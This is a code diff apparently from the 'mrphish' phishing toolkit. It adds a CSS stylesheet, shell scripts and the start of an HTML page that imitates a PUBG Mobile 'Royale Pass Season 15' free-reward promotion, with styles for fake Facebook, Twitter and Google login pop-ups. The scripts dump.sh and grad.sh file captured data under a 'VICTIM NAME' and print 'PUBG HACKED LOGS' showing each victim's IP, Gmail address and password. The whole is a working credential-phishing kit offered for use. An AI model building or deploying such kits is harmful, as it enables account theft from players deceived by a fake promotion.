     79 + border-radius: 5px;
     80 + outline: none;
     81 + float: left;
     82 +}
     83 +.btn-share-icon {
     84 + background: #ffcc57;
     85 + width: 25%;
     86 + height: 100%;
     87 + margin-right: 5px;
     88 + border-radius: 5px;
     89 + float: left;
     90 +}
     91 +.btn-share-icon i {
     92 + padding-top: 2px;
     93 + padding-left: 3.5px;
     94 + color: #000;
     95 + margin-left: auto;
     96 + margin-right: auto;
     97 + display: block;
     98 +}
     99 +.btn-share-txt {
     100 + padding-top: 1px;
     101 + color: #000;
     102 + font-size: 15px;
     103 + font-family: Teko, sans-serif;
     104 + text-align: center;
     105 +}
     106 +.landing-message {
     107 + width:100%;
     108 + height:238px;
     109 + border-bottom-left-radius: 10px;
     110 + border-bottom-right-radius: 10px;
     111 +}
     112 +.landing-message img {
     113 + width: 90px;
     114 + margin-top: 5px;
     115 + margin-left: auto;
     116 + margin-right: auto;
     117 + display: block;
     118 +}
     119 +.landing-message-title {
     120 + padding-top: 10px;
     121 + color: #eaa300;
     122 + font-size: 27px;
     123 + font-family: Teko, sans-serif;
     124 + font-weight: bold;
     125 + text-align: center;
     126 + text-transform: uppercase;
     127 + letter-spacing: 1px;
     128 +}
     129 +.divider{
     130 + display: block;
     131 + margin-left: 5%;
     132 + margin-right: 5%;
     133 + margin-top: -8px;
     134 + overflow: hidden;
     135 + text-align: center;
     136 + white-space: nowrap;
     137 + width: 45%;
     138 +}
     139 +.divider>span{
     140 + display: inline-block;
     141 + position: relative;
     142 + color: #eaa300;
     143 + cursor: default;
     144 + font-size: 20px;
     145 + font-family: Teko, sans-serif;
     146 + font-weight: bold;
     147 + text-transform: uppercase;
     148 + letter-spacing: 1px;
     149 +}
     150 +.divider>span:before, .divider>span:after{
     151 + background: #eaa300;
     152 + content: "";
     153 + height: 2px;
     154 + position: absolute;
     155 + top: 50%;
     156 + width: 9999px;
     157 +}
     158 +.divider>span:before{
     159 + margin-right: 10px;
     160 + right: 100%;
     161 +}
     162 +.divider>span:after{
     163 + left: 100%;
     164 + margin-left: 10px;
     165 +}
     166 +.btn-collect {
     167 + background: #eaa300;
     168 + width: 30%;
     169 + height: 33px;
     170 + margin-top: 20px;
     171 + margin-left: auto;
     172 + margin-right: auto;
     173 + padding: 5px;
     174 + border: 1px solid #ffcc57;
     175 + border-radius: 5px;
     176 + outline: none;
     177 + display: block;
     178 +}
     179 +.btn-collect-icon {
     180 + background: #ffcc57;
     181 + width: 20%;
     182 + height: 100%;
     183 + margin-right: 5px;
     184 + border-radius: 5px;
     185 + float: left;
     186 +}
     187 +.btn-collect-icon i {
     188 + padding-top: 2px;
     189 + padding-left: 3.5px;
     190 + color: #000;
     191 + margin-left: auto;
     192 + margin-right: auto;
     193 + display: block;
     194 +}
     195 +.btn-collect-txt {
     196 + padding-top: 1px;
     197 + color: #000;
     198 + font-size: 15px;
     199 + font-family: Teko, sans-serif;
     200 + text-align: center;
     201 +}
     202 +.reward-content {
     203 + width:95%;
     204 + height:88.5%;
     205 + margin-top: 3%;
     206 + margin-left:auto;
     207 + margin-right:auto;
     208 + display:block;
     209 +}
     210 +.menu-wrapper {
     211 + background: #eaa300;
     212 + width: 100%;
     213 + height: auto;
     214 + margin-top: 10px;
     215 + margin-left: auto;
     216 + margin-right: auto;
     217 + border: 1px solid #ffcc57;
     218 + border-radius: 5px;
     219 + display: block;
     220 +}
     221 +.menu-choose {
     222 + width: 32.5%;
     223 + height: auto;
     224 + padding: 6px;
     225 + padding-top: 8px;
     226 + color: #000;
     227 + text-align: center;
     228 + border-bottom: 3px solid transparent;
     229 + display: inline-block;
     230 +}
     231 +.menu-active {
     232 + background: rgba(255, 204, 87, 0.4);
     233 + border-bottom: 3px solid #ffcc57;
     234 + transition: 0.5s;
     235 +}
     236 +.menu-notify {
     237 + background: #eaa300;
     238 + width: 100%;
     239 + height: 35px;
     240 + margin-top: 10px;
     241 + margin-left: auto;
     242 + margin-right: auto;
     243 + margin-bottom: 10px;
     244 + padding: 5px;
     245 + border: 1px solid #ffcc57;
     246 + border-radius: 5px;
     247 + outline: none;
     248 + display: block;
     249 +}
     250 +.menu-notify-icon {
     251 + background: #ffcc57;
     252 + width: 6.5%;
     253 + height: 100%;
     254 + margin-right: 5px;
     255 + border-radius: 5px;
     256 + float: left;
     257 +}
     258 +.menu-notify-icon i {
     259 + padding-top: 2px;
     260 + padding-left: 3.5px;
     261 + color: #000;
     262 + font-size: 20px;
     263 + margin-left: auto;
     264 + margin-right: auto;
     265 + display: block;
     266 +}
     267 +.menu-notify-txt {
     268 + padding-top: 1px;
     269 + color: #000;
     270 + font-size: 15px;
     271 + font-family: Teko, sans-serif;
     272 + text-align: left;
     273 +}
     274 +.menu-notify-change {
     275 + background: #ffcc57;
     276 + width: 23%;
     277 + height: auto;
     278 + padding: 1px;
     279 + color: #000;
     280 + font-size: 15px;
     281 + font-family: Teko, sans-serif;
     282 + text-align: center;
     283 + border-radius: 3px;
     284 + float: right;
     285 +}
     286 +.scroll {
     287 + overflow:scroll;
     288 + position:relative;
     289 + height: 465px;
     290 + margin-top: 10px;
     291 + scrollbar-face-color:#ffbb40;
     292 + scrollbar-shadow-color:#ffbb40;
     293 + scrollbar-highlight-color:#ffbb40;
     294 + scrollbar-3dlight-color:#ffbb40;
     295 + scrollbar-darkshadow-color:#ffbb40;
     296 + scrollbar-track-color:#ffbb40;
     297 + scrollbar-arrow-color:#ffbb40;
     298 +}
     299 +.item {
     300 + background: #000;
     301 + width: 32%;
     302 + height: auto;
     303 + margin-bottom: 9px;
     304 + padding: 5px;
     305 + border: 1px solid #ffcc57;
     306 + border-radius: 5px;
     307 +}
     308 +.item img {
     309 + width: 100%;
     310 + height: 105px;
     311 + border: 1px solid #ffcc57;
     312 + border-radius: 5px;
     313 +}
     314 +.item button {
     315 + background: #eaa300;
     316 + width: 100%;
     317 + height: auto;
     318 + margin-top: 5px;
     319 + padding: 3px;
     320 + color: #000;
     321 + font-size: 15px;
     322 + font-family: Teko, sans-serif;
     323 + text-align: center;
     324 + border: 1px solid #ffcc57;
     325 + border-radius: 5px;
     326 + outline: none;
     327 +}
     328 +.balance {
     329 + background: #000;
     330 + width: 32%;
     331 + height: auto;
     332 + margin-bottom: 9px;
     333 + padding: 5px;
     334 + border: 1px solid #ffcc57;
     335 + border-radius: 5px;
     336 +}
     337 +.balance-content-cash {
     338 + width: 100%;
     339 + height: 105px;
     340 + border: 1px solid #ffcc57;
     341 + border-radius: 5px;
     342 +}
     343 +.balance-content-other {
     344 + width: 100%;
     345 + height: 105px;
     346 + border: 1px solid #ffcc57;
     347 + border-radius: 5px;
     348 +}
     349 +.balance-content-cash img {
     350 + width: 50;
     351 + margin-top: 10px;
     352 + margin-bottom: 9px;
     353 + margin-left: auto;
     354 + margin-right: auto;
     355 + display: block;
     356 +}
     357 +.balance-content-other img {
     358 + width: 50;
     359 + margin-top: 10px;
     360 + margin-bottom: 9px;
     361 + margin-left: auto;
     362 + margin-right: auto;
     363 + border: 1px solid #ffcc57;
     364 + border-radius: 5px;
     365 + display: block;
     366 +}
     367 +.balance-currency {
     368 + width: 100%;
     369 + height: auto;
     370 + color: #eaa300;
     371 + font-size: 18px;
     372 + font-family: Teko, sans-serif;
     373 + text-align: center;
     374 +}
     375 +.balance-price {
     376 + background: #eaa300;
     377 + width: 100%;
     378 + height: auto;
     379 + padding: 5px;
     380 + color: #000;
     381 + font-size: 15px;
     382 + font-family: Teko, sans-serif;
     383 + text-align: center;
     384 + border: 1px solid #ffcc57;
     385 + border-left: 0px;
     386 + border-right: 0px;
     387 + border-bottom: 0px;
     388 + border-bottom-left-radius: 4px;
     389 + border-bottom-right-radius: 4px;
     390 +}
     391 +.balance button {
     392 + background: #eaa300;
     393 + width: 100%;
     394 + height: auto;
     395 + margin-top: 5px;
     396 + padding: 3px;
     397 + color: #000;
     398 + font-size: 15px;
     399 + font-family: Teko, sans-serif;
     400 + text-align: center;
     401 + border: 1px solid #ffcc57;
     402 + border-radius: 5px;
     403 + outline: none;
     404 +}
     405 +.popup {
     406 + width:100%;
     407 + height:100%;
     408 + position:fixed;
     409 + top:0;
     410 + left:0;
     411 + z-index:9999;
     412 + overflow-y:scroll;
     413 +}
     414 +.item-confirmation {
     415 + background: #eaa300;
     416 + width: 100%;
     417 + height: 105px;
     418 + margin-top: 10px;
     419 + border: 1px solid #ffcc57;
     420 + border-radius: 5px;
     421 +}
     422 +.item-confirmation-img-box {
     423 + width: 28%;
     424 + height: 100%;
     425 + padding: 5px;
     426 + border-right: 1px solid #ffcc57;
     427 + float: left;
     428 +}
     429 +.item-confirmation-img-box img {
     430 + width: 100%;
     431 + height: 100%;
     432 + border: 1px solid #ffcc57;
     433 + border-radius: 5px;
     434 +}
     435 +.item-confirmation-info {
     436 + width: 72%;
     437 + height: 100%;
     438 + float: right;
     439 +}
     440 +.item-confirmation-status-title {
     441 + background: #ffcc57;
     442 + width: 37%;
     443 + height: auto;
     444 + margin-top: 6px;
     445 + margin-left: 5px;
     446 + padding-left: 5px;
     447 + padding-right: 5px;
     448 + color: #000;
     449 + font-size: 15px;
     450 + font-family: Teko, sans-serif;
     451 + text-align: left;
     452 + border-radius: 2px;
     453 +}
     454 +.item-confirmation-status-info {
     455 + width: auto;
     456 + height: auto;
     457 + margin-top: 4px;
     458 + margin-left: 5px;
     459 + padding-top: 3px;
     460 + padding-left: 4px;
     461 + padding-right: 5px;
     462 + color: #000;
     463 + font-size: 15px;
     464 + font-family: Teko, sans-serif;
     465 + text-align: left;
     466 + line-height: 10px;
     467 + border-left: 1px solid #ffcc57;
     468 +}
     469 +.item-confirmation-information-title {
     470 + background: #ffcc57;
     471 + width: 37%;
     472 + height: auto;
     473 + margin-top: 14px;
     474 + margin-left: 5px;
     475 + padding-left: 5px;
     476 + padding-right: 5px;
     477 + color: #000;
     478 + font-size: 15px;
     479 + font-family: Teko, sans-serif;
     480 + text-align: left;
     481 + border-radius: 2px;
     482 +}
     483 +.item-confirmation-information-info {
     484 + width: auto;
     485 + height: auto;
     486 + margin-top: 4px;
     487 + margin-left: 5px;
     488 + padding-top: 3px;
     489 + padding-left: 4px;
     490 + padding-right: 5px;
     491 + color: #000;
     492 + font-size: 15px;
     493 + font-family: Teko, sans-serif;
     494 + text-align: left;
     495 + line-height: 10px;
     496 + border-left: 1px solid #ffcc57;
     497 +}
     498 +.btn-popup-wrapper {
     499 + width: 85%;
     500 + height: 80px;
     501 + margin-left: auto;
     502 + margin-right: auto;
     503 + display: block;
     504 +}
     505 +.btn-popup {
     506 + background: #eaa300;
     507 + width: 49%;
     508 + height: 33px;
     509 + margin-top: 20px;
     510 + padding: 5px;
     511 + border: 1px solid #ffcc57;
     512 + border-radius: 5px;
     513 + outline: none;
     514 +}
     515 +.btn-popup-icon {
     516 + background: #ffcc57;
     517 + width: 15%;
     518 + height: 100%;
     519 + margin-right: 5px;
     520 + border-radius: 5px;
     521 + float: left;
     522 +}
     523 +.btn-popup-icon i {
     524 + padding-top: 2px;
     525 + padding-left: 3.5px;
     526 + color: #000;
     527 + margin-left: auto;
     528 + margin-right: auto;
     529 + display: block;
     530 +}
     531 +.btn-popup-txt {
     532 + padding-top: 1px;
     533 + color: #000;
     534 + font-size: 15px;
     535 + font-family: Teko, sans-serif;
     536 + text-align: center;
     537 +}
     538 +.btn-submit-popup-txt {
     539 + background: none;
     540 + width: 81%;
     541 + padding-left: 10px;
     542 + color: #000;
     543 + font-size: 15px;
     544 + font-family: Teko, sans-serif;
     545 + text-align: left;
     546 + line-height: 20px;
     547 + border: none;
     548 + outline: none;
     549 + float: right;
     550 +}
     551 +.btn-login {
     552 + background: #eaa300;
     553 + width: 100%;
     554 + height: 51px;
     555 + margin-bottom: 3px;
     556 + border: 1px solid #ffcc57;
     557 + border-radius: 5px;
     558 +}
     559 +.btn-login-logo {
     560 + background: #ffcc57;
     561 + width: 16%;
     562 + height: 100%;
     563 + padding: 5px;
     564 + border-top-left-radius: 2px;
     565 + border-bottom-left-radius: 2px;
     566 + float: left;
     567 +}
     568 +.btn-login-logo img {
     569 + width: 39px;
     570 + margin-left: auto;
     571 + margin-right: auto;
     572 + display: block;
     573 +}
     574 +.btn-login-txt {
     575 + margin-top: 10px;
     576 + color: #000;
     577 + font-size: 20px;
     578 + font-family: Teko, sans-serif;
     579 + text-align: center;
     580 +}
     581 +.popup-login {
     582 + background:rgba(0,0,0,0.5);
     583 + width:100%;
     584 + height:100%;
     585 + position:fixed;
     586 + top:0;
     587 + left:0;
     588 + z-index:9999;
     589 +}
     590 +.popup-box-login-fb {
     591 + background:#ECEFF6;
     592 + max-width:330px;
     593 + height:auto;
     594 + position:relative;
     595 + margin:50px auto;
     596 + margin-top:1.9%;
     597 + text-align:center;
     598 + font-family:'Teko';
     599 + color:#000;
     600 + border-radius:10px;
     601 +}
     602 +.popup-box-login-twitter {
     603 + background:#fff;
     604 + max-width:330px;
     605 + height:350px;
     606 + position:relative;
     607 + margin:50px auto;
     608 + margin-top:10%;
     609 + text-align:center;
     610 + font-family:'Teko';
     611 + color:#000;
     612 + border-radius:10px;
     613 +}
     614 +.popup-box-login-google {
     615 + background:#fff;
     616 + max-width:330px;
     617 + height:400px;
     618 + position:relative;
     619 + margin:50px auto;
     620 + margin-top:10%;
     621 + padding:15px;
     622 + text-align:center;
     623 + font-family:'Teko';
     624 + color:#000;
     625 + border-radius:10px;
     626 +}
     627 +.close-fb {
     628 + background:#000;
     629 + width:20px;
     630 + height:20px;
     631 + color:#fff;
     632 + text-align:center;
     633 + text-decoration:none;
     634 + border-radius:50%;
     635 + border:1.5px solid #fff;
     636 + position:absolute;
     637 + top:-8px;
     638 + right:-10px;
     639 + display:block;
     640 +}
     641 +.close-fb i {
     642 + color:#fff;
     643 + padding-top:1px;
     644 +}
     645 +.close-other {
     646 + background:#000;
     647 + width:20px;
     648 + height:20px;
     649 + color:#fff;
     650 + text-align:center;
     651 + text-decoration:none;
     652 + border-radius:50%;
     653 + border:1.5px solid #fff;
     654 + top:-8px;
     655 + right:-10px;
     656 + position:absolute;
     657 + z-index:9999999;
     658 + display:block;
     659 +}
     660 +.close-other i {
     661 + color:#fff;
     662 + padding-top:1px;
     663 +}
     664 +.input-verify {
     665 + background: #eaa300;
     666 + width: 100%;
     667 + height: auto;
     668 + padding: 8px;
     669 + color: #000;
     670 + font-size: 15px;
     671 + font-family: 'Teko', sans-serif;
     672 + text-align: left;
     673 + border: 1px solid #ffcc57;
     674 + outline: none;
     675 +}
     676 +.select-verify {
     677 + background: #eaa300;
     678 + width: 100%;
     679 + height: auto;
     680 + padding: 10px;
     681 + color: #000;
     682 + font-size: 15px;
     683 + font-family: 'Teko', sans-serif;
     684 + text-align: left;
     685 + border: 1px solid #ffcc57;
     686 + outline: none;
     687 +}
     688 +.br-line-top-none {
     689 + border-top: 0px;
     690 +}
     691 +.br-top {
     692 + border-top-left-radius: 5px;
     693 + border-top-right-radius: 5px;
     694 +}
     695 +.br-bottom {
     696 + border-bottom-left-radius: 5px;
     697 + border-bottom-right-radius: 5px;
     698 +}
     699 +.btn-verify {
     700 + background: #eaa300;
     701 + width: 40%;
     702 + height: 33px;
     703 + margin-top: 10px;
     704 + margin-left: auto;
     705 + margin-right: auto;
     706 + padding: 5px;
     707 + color: #000;
     708 + font-size: 15px;
     709 + font-family: Teko, sans-serif;
     710 + text-align: center;
     711 + border: 1px solid #ffcc57;
     712 + border-radius: 5px;
     713 + outline: none;
     714 + display: block;
     715 +}
     716 +.btn-verify-icon {
     717 + background: #ffcc57;
     718 + width: 18%;
     719 + height: 100%;
     720 + border-radius: 5px;
     721 + float: left;
     722 +}
     723 +.btn-verify-icon i {
     724 + padding-top: 1px;
     725 + color: #000;
     726 + font-size: 19px;
     727 + margin-left: auto;
     728 + margin-right: auto;
     729 + display: block;
     730 +}
     731 +.message-box-finish {
     732 + background: #eaa300;
     733 + width: 100%;
     734 + height: auto;
     735 + padding: 5px;
     736 + color: #000;
     737 + font-size: 15px;
     738 + font-family: Teko, sans-serif;
     739 + text-align: left;
     740 + border: 1px solid #ffcc57;
     741 + border-radius: 5px;
     742 +}
     743 +.notify-process {
     744 + width: auto;
     745 + height: auto;
     746 + padding-left: 8px;
     747 + padding-right: 8px;
     748 + color: #000;
     749 + font-size: 15px;
     750 + font-family: Teko, sans-serif;
     751 + text-align: left;
     752 + border: 1px solid #ffcc57;
     753 + border-radius: 5px;
     754 + float: right;
     755 +}
     756 +.kiri {
     757 + float: left;
     758 +}
     759 +.kanan {
     760 + float: right;
     761 +}
     762 +.tengah {
     763 + margin-left: auto;
     764 + margin-right: auto;
     765 + display: block;
     766 +}
     767 +::-webkit-scrollbar {
     768 + display:none;
     769 +}
     770 +input::-webkit-outer-spin-button,
     771 +input::-webkit-inner-spin-button {
     772 +-webkit-appearance: none;
     773 +margin: 0;
     774 +}
     775 +select::-ms-expand {
     776 +display: none;
     777 +}
     778 +select{
     779 +-webkit-appearance: none;
     780 +appearance: none;
     781 +}
     782 +@media only screen and (max-width:600px) {
     783 + .container,.container-mask {
     784 + width:100%;
     785 + height:100%;
     786 + margin-top:0px;
     787 + margin-bottom:0px;
     788 + border: none;
     789 + border-radius:0px;
     790 + padding:0px;
     791 + }
     792 + .navbar {
     793 + border-radius:0px;
     794 + }
     795 + .navbar-logo-box {
     796 + border-top-left-radius: 0px;
     797 + }
     798 + .landing-content {
     799 + height: 280px;
     800 + }
     801 + .btn-share-icon {
     802 + width: 27%;
     803 + }
     804 + .landing-message {
     805 + border-radius: 0px;
     806 + }
     807 + .btn-collect-icon {
     808 + width: 21%;
     809 + }
     810 + .item img {
     811 + height: 90px;
     812 + }
     813 + .item-confirmation-img-box {
     814 + margin-top: 5px;
     815 + height: 92px;
     816 + }
     817 + .item-confirmation-status-title {
     818 + width: 39%;
     819 + }
     820 + .item-confirmation-information-title {
     821 + width: 43%;
     822 + }
     823 + .menu-notify-icon {
     824 + width: 7.1%;
     825 + }
     826 + .btn-popup-icon {
     827 + width: 15.5%;
     828 + }
     829 + .btn-popup-icon i {
     830 + padding-top: 3px;
     831 + }
     832 + .popup-box-login-fb {
     833 + margin-top: 5%;
     834 + }
     835 +}
  • ■ ■ ■ ■ ■ ■
    pubg/notp/dump.sh
     1 +echo -e "\e[96m | "
     2 +read -p $'\n\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] VICTIM NAME: \e[0m' name
     3 +cd /sdcard/dUmpS
     4 +mkdir $name
     5 +cd $HOME/mrphish/core/deploys/gaming/pubg/notp
     6 +mv *.txt /sdcard/dUmpS/$name
     7 +cp grad.sh /sdcard/dUmpS/$name
     8 +sleep 2.3
     9 +echo -e "\e[96m | "
     10 +printf " \e[1;92m\e[0m\e[1;96m|------------------[\e[92mDONE\e[96m]\e[0m\n"
     11 +cd $HOME/mrphish
     12 +bash mrphish
     13 + 
  • ■ ■ ■ ■ ■ ■
    pubg/notp/grad.sh
     1 +clear
     2 +echo
     3 +echo -e '\e[96m
     4 + __ _____ ___ ___
     5 + ( ) ( _ )/ __)/ __)
     6 + )(__ )(_)(( (_-.\__ \\'
     7 +echo -e '\e[91m (____)(_____)\___/(___/ \e[0m'
     8 +echo " "
     9 +echo " PUBG HACKED LOGS........."
     10 +echo -e "\e[96m |---------------------------------------------------------------|"
     11 +ip=$(cat ip.txt)
     12 +printf "\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] IP:\e[0m\e[1;92m $ip \e[0m\n" $ip
     13 +echo -e "\e[96m |---------------------------------------------------------------|"
     14 +ip=$(cat gmail.txt)
     15 +printf "\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] GMAIL:\e[0m\e[1;92m $ip \e[0m\n" $ip
     16 +echo -e "\e[96m |---------------------------------------------------------------|"
     17 +ip=$(cat pass.txt)
     18 +printf "\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] PASS:\e[0m\e[1;92m $ip \e[0m\n" $ip
     19 +echo -e "\e[96m |---------------------------------------------------------------|"
     20 +sleep 8.0
     21 +if [ -f "ngrok" ];
     22 +then
     23 +rm ngrok
     24 +else
     25 +sleep 0.2
     26 +fi
     27 +#ip=$(cat gml.txt)
     28 +#printf "\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] NUMBER:\e[0m\e[1;77m $ip \e[0m\n" $ip
     29 +#ip=$(cat num.txt)
     30 +#printf "\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] BIO:\e[0m\e[1;77m $ip \e[0m\n" $ip
     31 +#ip=$(cat bio.txt)
     32 +#printf "\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] USER:\e[0m\e[1;77m $ip \e[0m\n" $ip
     33 +#ip=$(cat usr.txt)
     34 +#printf "\e[1;92m[\e[0m\e[1;77m+\e[0m\e[1;93m] IP:\e[0m\e[1;77m $ip \e[0m\n" $ip
     35 +#ip=$(cat cred.txt)
     36 +#printf "\e[1;93m[\e[0m\e[1;77m|\e[0m\e[1;93m] OT \e[0m\e[1;92m $ip \e[0m\n" $ip
     37 + 
  • ■ ■ ■ ■ ■ ■
    pubg/notp/index.html
     1 +<html>
     2 +<head>
     3 +<meta charset="UTF-8" />
     4 +<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" />
     5 +<meta http-equiv="X-UA-Compatible" content="IE=edge">
     6 +<meta property="og:title" content="PUBG MOBILE - Royale Pass Season 15">
     7 +<meta name="description" content="Royale Pass Season 15 has begun! Collect your favorite prizes here right now !!! This promo is free without the need for topup. Come join this event with friends all over the world now!">
     8 +<meta property="og:description" content="Royale Pass Season 15 has begun! Collect your favorite prizes here right now !!! This promo is free without the need for topup. Come join this event with friends all over the world now!">
     9 +<meta property="og:url" content="./">
     10 +<meta property="og:site_name" content="PUBG MOBILE - Royale Pass Season 15">
     11 +<meta property="og:type" content="website">
     12 +<meta name="copyright" content="PUBG MOBILE">
     13 +<meta name="theme-color" content="#000">
     14 +<meta property="og:image" content="https://i.ibb.co/y4BNtrv/season.png">
     15 +<title>PUBG MOBILE - Royale Pass Season 15</title>
     16 +<link rel="stylesheet" href="css/style.css">
     17 +<link rel="stylesheet" href="css/login/facebook.css">
     18 +<link rel="stylesheet" href="css/login/twitter.css">
     19 +<link rel="stylesheet" href="css/login/google.css">
     20 +<link rel="stylesheet" href="css/animate.css">
     21 +<link rel="stylesheet" href="ajax/libs/material-design-iconic-font/2-2-0/css/material-design-iconic-font.css">
     22 +<link href="font-awesome/4-7-0/css/font-awesome.min.css" rel="stylesheet" >
     23 +<link rel="icon" href="https://user-images.githubusercontent.com/49580304/102182159-a7ec5d00-3e60-11eb-9656-bae13ee6afd0.jpg">
     24 +</head>
     25 +<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
     26 +<div class="container">
     27 +<div class="g-mask">
     28 +<div class="navbar">
     29 +<div class="navbar-menu">
     30 +<i class="fa fa-bars"></i>
     31 +</div>
     32 +<div class="navbar-logo-box">
     33 +<img src="https://user-images.githubusercontent.com/49580304/102179370-da478b80-3e5b-11eb-9d3a-20b6f93d217f.png">
     34 +</div>
     35 +</div>
     36 +<div class="reward-content">
     37 +<div class="menu-wrapper">
     38 +<center>
     39 +<div class="menu-choose kiri" style="border-top-left-radius: 3px; border-bottom-left-radius: 3px;" onclick="openRewards(event, 'latest');" id="defaultTabRewards">Latest Reward</div>
     40 +<div class="menu-choose kanan" style="border-top-right-radius: 3px; border-bottom-right-radius: 3px;" onclick="openRewards(event, 'other');">Other Reward</div>
     41 +<div class="menu-choose tengah" onclick="openRewards(event, 'season');">Season Reward</div>
     42 +</center>
     43 +</div>
     44 +<div class="tab_rewards" id="latest">
     45 +<div class="menu-notify">
     46 +<div class="menu-notify-icon"><i class="zmdi zmdi-info-outline"></i></div>
     47 +<div class="menu-notify-txt">Hi survivor, this is the latest reward for you today</div>
     48 +</div>
     49 +<div class="scroll">
     50 +<div class="item kanan">
     51 +<img src="https://user-images.githubusercontent.com/49580304/102170024-48825300-3e48-11eb-9f7b-0deb14d48230.png">
     52 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102170024-48825300-3e48-11eb-9f7b-0deb14d48230.png">Collect</button>
     53 +</div>
     54 +<div class="item kiri">
     55 +<img src="https://user-images.githubusercontent.com/49580304/102170601-98154e80-3e49-11eb-8fd3-3b715ef0df65.jpg">
     56 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102170601-98154e80-3e49-11eb-8fd3-3b715ef0df65.jpg">Collect</button>
     57 +</div>
     58 +<div class="item tengah">
     59 +<img src="https://user-images.githubusercontent.com/49580304/102170765-f2161400-3e49-11eb-8a2f-2183aba4ee05.jpg">
     60 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102170765-f2161400-3e49-11eb-8a2f-2183aba4ee05.jpgss">Collect</button>
     61 +</div>
     62 +<div class="item kanan">
     63 +<img src="https://user-images.githubusercontent.com/49580304/102170871-2db0de00-3e4a-11eb-9abb-99f1e6e9e293.jpg">
     64 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102170871-2db0de00-3e4a-11eb-9abb-99f1e6e9e293.jpg">Collect</button>
     65 +</div>
     66 +<div class="item kiri">
     67 +<img src="https://user-images.githubusercontent.com/49580304/102170895-3acdcd00-3e4a-11eb-840d-3b05bf73e93e.jpg">
     68 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102170895-3acdcd00-3e4a-11eb-840d-3b05bf73e93e.jpg">Collect</button>
     69 +</div>
     70 +<div class="item tengah">
     71 +<img src="https://user-images.githubusercontent.com/49580304/102170936-4d480680-3e4a-11eb-9a68-0dafcb0c9afc.jpg">
     72 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102170936-4d480680-3e4a-11eb-9a68-0dafcb0c9afc.jpg">Collect</button>
     73 +</div>
     74 +<div class="item kanan">
     75 +<img src="https://user-images.githubusercontent.com/49580304/102170962-5afd8c00-3e4a-11eb-979d-bbbb54e4ed76.jpg">
     76 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102170962-5afd8c00-3e4a-11eb-979d-bbbb54e4ed76.jpg">Collect</button>
     77 +</div>
     78 +<div class="item kiri">
     79 +<img src="https://user-images.githubusercontent.com/49580304/102171006-68b31180-3e4a-11eb-996d-57e64569e600.jpg">
     80 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102171006-68b31180-3e4a-11eb-996d-57e64569e600.jpg">Collect</button>
     81 +</div>
     82 +<div class="item tengah">
     83 +<img src="https://user-images.githubusercontent.com/49580304/102171023-749ed380-3e4a-11eb-80a6-226dd45b1017.jpg">
     84 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102171023-749ed380-3e4a-11eb-80a6-226dd45b1017.jpg">Collect</button>
     85 +</div>
     86 +<div class="item kanan">
     87 +<img src="https://user-images.githubusercontent.com/49580304/102171232-e70fb380-3e4a-11eb-90bb-03dc2bf02501.jpg">
     88 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102171232-e70fb380-3e4a-11eb-90bb-03dc2bf02501.jpg">Collect</button>
     89 +</div>
     90 +<div class="item kiri">
     91 +<img src="https://user-images.githubusercontent.com/49580304/102171251-f42ca280-3e4a-11eb-9c24-2777e124ff92.jpg">
     92 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102171251-f42ca280-3e4a-11eb-9c24-2777e124ff92.jpg">Collect</button>
     93 +</div>
     94 +<div class="item tengah">
     95 +<img src="https://user-images.githubusercontent.com/49580304/102171272-03abeb80-3e4b-11eb-8fcc-6dec3262d594.jpg">
     96 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102171272-03abeb80-3e4b-11eb-8fcc-6dec3262d594.jpg">Collect</button>
     97 +</div>
     98 +<div class="item kanan">
     99 +<img src="https://user-images.githubusercontent.com/49580304/102171288-0dcdea00-3e4b-11eb-9bb9-282db8b0d7b9.png">
     100 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102171288-0dcdea00-3e4b-11eb-9bb9-282db8b0d7b9.png">Collect</button>
     101 +</div>
     102 +<div class="item kiri">
     103 +<img src="https://user-images.githubusercontent.com/49580304/102171307-19211580-3e4b-11eb-80a9-60db877783f6.png">
     104 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102171307-19211580-3e4b-11eb-80a9-60db877783f6.png">Collect</button>
     105 +</div>
     106 +<div class="item tengah">
     107 +<img src="https://user-images.githubusercontent.com/49580304/102171586-bda35780-3e4b-11eb-986e-d72196fb17e7.png">
     108 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102171586-bda35780-3e4b-11eb-986e-d72196fb17e7.png">Collect</button>
     109 +</div>
     110 +<div class="item kanan">
     111 +<img src="https://user-images.githubusercontent.com/49580304/102171618-d14ebe00-3e4b-11eb-8ec6-30567dbaab9c.png">
     112 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102171618-d14ebe00-3e4b-11eb-8ec6-30567dbaab9c.png">Collect</button>
     113 +</div>
     114 +<div class="item kiri">
     115 +<img src="https://user-images.githubusercontent.com/49580304/102171645-e62b5180-3e4b-11eb-94f3-098c27eba556.png">
